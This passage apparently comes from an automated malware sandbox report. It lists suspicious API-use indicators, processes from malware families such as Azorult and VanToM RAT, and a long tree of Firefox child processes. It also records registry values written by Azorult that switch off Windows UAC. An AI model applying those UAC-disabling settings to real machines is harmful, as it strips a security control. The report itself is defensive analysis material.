pid Process 4552 v.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe -
Suspicious use of SendNotifyMessage 57 IoCs
pid Process 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 5924 firefox.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 5468 ButterflyOnDesktop.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe 7096 chrome.exe -
Suspicious use of SetWindowsHookEx 52 IoCs
pid Process 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 2472 firefox.exe 5924 firefox.exe 3004 OpenWith.exe 7096 chrome.exe 1448 VanToM-Rat.bat 4000 Server.exe 824 rutserv.exe 4536 rutserv.exe 3544 rutserv.exe 7136 rutserv.exe 7212 iexplore.exe 7212 iexplore.exe 5112 IEXPLORE.EXE 5112 IEXPLORE.EXE 5428 OpenWith.exe 8056 Bugsoft.exe 6720 Gruel.a.exe 3244 Rundll32.exe 4576 Rundll32.exe 7564 Rundll32.exe 7048 Gruel.a.exe 7436 Gruel.a.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 1376 wrote to memory of 2472 1376 firefox.exe 85 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 3796 2472 firefox.exe 86 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 PID 2472 wrote to memory of 2164 2472 firefox.exe 87 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 6 IoCs
pid Process 4512 attrib.exe 5796 attrib.exe 8064 attrib.exe 3872 attrib.exe 4304 attrib.exe 1560 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\v.exe"C:\Users\Admin\AppData\Local\Temp\v.exe"1⤵
- Suspicious use of FindShellTrayWindow
PID:4552
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27100 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {7852bb8a-f8ff-4939-b84a-11cac33976b5} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu3⤵PID:3796
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27136 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {00bee9cd-b870-44da-b5f3-c4fc516906c1} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket3⤵
- Checks processor information in registry
PID:2164
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4060 -prefsLen 27277 -prefMapHandle 4064 -prefMapSize 270279 -jsInitHandle 4068 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4076 -initialChannelId {6fea9550-e899-46d0-899e-a2c98217111d} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab3⤵PID:3852
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4228 -prefsLen 27277 -prefMapHandle 4232 -prefMapSize 270279 -ipcHandle 4248 -initialChannelId {7c1cf623-63a2-4d11-a6ef-a1f1b43adff1} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd3⤵PID:4184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2620 -prefsLen 34776 -prefMapHandle 3928 -prefMapSize 270279 -jsInitHandle 3164 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 1028 -initialChannelId {a0e1488b-920a-4a3b-89ca-c4987333f015} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab3⤵PID:2388
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4976 -prefsLen 35013 -prefMapHandle 4980 -prefMapSize 270279 -ipcHandle 4916 -initialChannelId {01758fbc-8a94-47d7-9af5-32c1d310e37d} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility3⤵
- Checks processor information in registry
PID:744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5220 -prefsLen 32900 -prefMapHandle 5224 -prefMapSize 270279 -jsInitHandle 5228 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5204 -initialChannelId {332da297-0677-46a8-bf13-57b256ad1ef3} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab3⤵PID:1680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5420 -prefsLen 32952 -prefMapHandle 4972 -prefMapSize 270279 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5452 -initialChannelId {8dd731b8-4a2c-4025-8b79-21227b1f2d64} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab3⤵
- Checks processor information in registry
PID:2824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5436 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5472 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5480 -initialChannelId {0002e693-0fe6-4b64-8983-cfcfacf22ac7} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab3⤵PID:3400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6332 -prefsLen 33071 -prefMapHandle 6336 -prefMapSize 270279 -jsInitHandle 6340 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6260 -initialChannelId {06f9e34f-be20-4f82-8684-a4b683ecd23e} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab3⤵
- Checks processor information in registry
PID:2228
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6628 -prefsLen 33071 -prefMapHandle 6632 -prefMapSize 270279 -jsInitHandle 6636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6572 -initialChannelId {592455e8-0d6e-404e-a9a2-80293a45c1a6} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab3⤵
- Checks processor information in registry
PID:3080
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5432 -prefsLen 33071 -prefMapHandle 5512 -prefMapSize 270279 -jsInitHandle 5988 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5404 -initialChannelId {d6d1b970-5826-4857-afa4-671aa34d207a} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab3⤵
- Checks processor information in registry
PID:5476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5444 -prefsLen 33681 -prefMapHandle 5744 -prefMapSize 270279 -jsInitHandle 5460 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5476 -initialChannelId {7cb60182-9a33-47f3-822c-4e0e36f409d3} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab3⤵
- Checks processor information in registry
PID:5196
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4816 -prefsLen 36739 -prefMapHandle 7192 -prefMapSize 270279 -jsInitHandle 4820 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4636 -initialChannelId {3d8b95e6-780c-47c2-8907-1dea12d5461d} -parentPid 2472 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2472" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab3⤵
- Checks processor information in registry
PID:5612
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:4080
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5924 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2044 -prefsLen 30981 -prefMapHandle 2052 -prefMapSize 270978 -ipcHandle 2116 -initialChannelId {9bd05969-3005-4cde-83e6-5496b160d9e2} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu3⤵PID:5140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2372 -prefsLen 30981 -prefMapHandle 2376 -prefMapSize 270978 -ipcHandle 2384 -initialChannelId {8012f757-cd52-48f2-aa93-2fcde6264ea9} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket3⤵
- Checks processor information in registry
PID:5444
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3808 -prefsLen 31540 -prefMapHandle 3812 -prefMapSize 270978 -jsInitHandle 3816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3824 -initialChannelId {6d2db959-5ddd-4e0c-9159-c4af69d69093} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab3⤵PID:3568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4000 -prefsLen 31540 -prefMapHandle 4004 -prefMapSize 270978 -ipcHandle 4012 -initialChannelId {913e83ff-0813-49d3-bcc8-68f207289367} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd3⤵PID:4144
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4660 -prefsLen 39096 -prefMapHandle 4664 -prefMapSize 270978 -jsInitHandle 4668 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4676 -initialChannelId {dedb3c3f-7034-4bbc-9e60-2128372732c4} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab3⤵PID:1716
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5032 -prefsLen 39199 -prefMapHandle 5024 -prefMapSize 270978 -ipcHandle 3612 -initialChannelId {961f63b5-282b-4375-b741-468d12540c6d} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility3⤵
- Checks processor information in registry
PID:4784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4784 -prefsLen 36154 -prefMapHandle 4768 -prefMapSize 270978 -jsInitHandle 4772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4760 -initialChannelId {16d8aac7-35d1-4233-a40d-c8a0cffe182a} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab3⤵
- Checks processor information in registry
PID:4484
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4708 -prefsLen 36154 -prefMapHandle 4736 -prefMapSize 270978 -jsInitHandle 4604 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5468 -initialChannelId {f7d2adb1-2ff6-4b10-9e5b-d999769f570b} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab3⤵
- Checks processor information in registry
PID:1996
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4708 -prefsLen 36154 -prefMapHandle 5492 -prefMapSize 270978 -jsInitHandle 5480 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5568 -initialChannelId {7bdffbd4-b55b-4c27-837d-8049da4ac96d} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab3⤵
- Checks processor information in registry
PID:5844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2576 -prefsLen 36154 -prefMapHandle 1936 -prefMapSize 270978 -jsInitHandle 5620 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5716 -initialChannelId {6263e48c-65dd-40f1-9b68-a098604ea1c4} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab3⤵
- Checks processor information in registry
PID:2676
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5896 -prefsLen 36154 -prefMapHandle 5900 -prefMapSize 270978 -jsInitHandle 5904 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5912 -initialChannelId {3c0359f8-6d88-4cb7-917d-de6575b53bbc} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab3⤵
- Checks processor information in registry
PID:2596
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6088 -prefsLen 36154 -prefMapHandle 6092 -prefMapSize 270978 -jsInitHandle 6096 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6104 -initialChannelId {53dc1909-9902-4791-a02f-f6d74cbb4920} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab3⤵PID:1896
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6304 -prefsLen 36154 -prefMapHandle 6308 -prefMapSize 270978 -jsInitHandle 6312 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6320 -initialChannelId {27243db7-5fc3-49d9-9dab-d8571bdbbba5} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 13 tab3⤵PID:3332
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6512 -prefsLen 36154 -prefMapHandle 6516 -prefMapSize 270978 -jsInitHandle 6520 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6528 -initialChannelId {3028423d-4ad8-46d8-967b-cce9f4323510} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 14 tab3⤵
- Checks processor information in registry
PID:2744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6680 -prefsLen 36154 -prefMapHandle 6684 -prefMapSize 270978 -jsInitHandle 4084 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5412 -initialChannelId {89c6e20f-2c19-4793-b48b-dc3ab88a4a14} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 15 tab3⤵
- Checks processor information in registry
PID:3316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6848 -prefsLen 36154 -prefMapHandle 6852 -prefMapSize 270978 -jsInitHandle 6856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6864 -initialChannelId {d6aeb785-19f2-474d-ab70-bd3c82d5b733} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 16 tab3⤵
- Checks processor information in registry
PID:4396
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5840 -prefsLen 36154 -prefMapHandle 5836 -prefMapSize 270978 -jsInitHandle 5736 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2576 -initialChannelId {7e0a423b-2016-490f-be4a-2a30b76fc441} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 17 tab3⤵
- Checks processor information in registry
PID:2960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4784 -prefsLen 36154 -prefMapHandle 1936 -prefMapSize 270978 -jsInitHandle 7052 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7060 -initialChannelId {381ef877-f7d9-43fa-89e2-16b7289ed50d} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 18 tab3⤵
- Checks processor information in registry
PID:2720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7240 -prefsLen 36154 -prefMapHandle 7244 -prefMapSize 270978 -jsInitHandle 7248 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7256 -initialChannelId {8bf15071-3c80-4ef4-a3e7-b546abd2b877} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 19 tab3⤵
- Checks processor information in registry
PID:3176
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7432 -prefsLen 36154 -prefMapHandle 7436 -prefMapSize 270978 -jsInitHandle 7440 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7448 -initialChannelId {b60f57c5-ec89-427f-a2f3-0a076a42a6db} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 20 tab3⤵
- Checks processor information in registry
PID:3636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7464 -prefsLen 36154 -prefMapHandle 7564 -prefMapSize 270978 -jsInitHandle 7568 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7636 -initialChannelId {9aff59ac-7b33-492d-9933-444eb52804cc} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 21 tab3⤵
- Checks processor information in registry
PID:1376
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7816 -prefsLen 36154 -prefMapHandle 7820 -prefMapSize 270978 -jsInitHandle 7824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7832 -initialChannelId {4b0ba2aa-059e-4265-89d2-235bbea67d84} -parentPid 5924 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5924" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 22 tab3⤵PID:5164
-
-
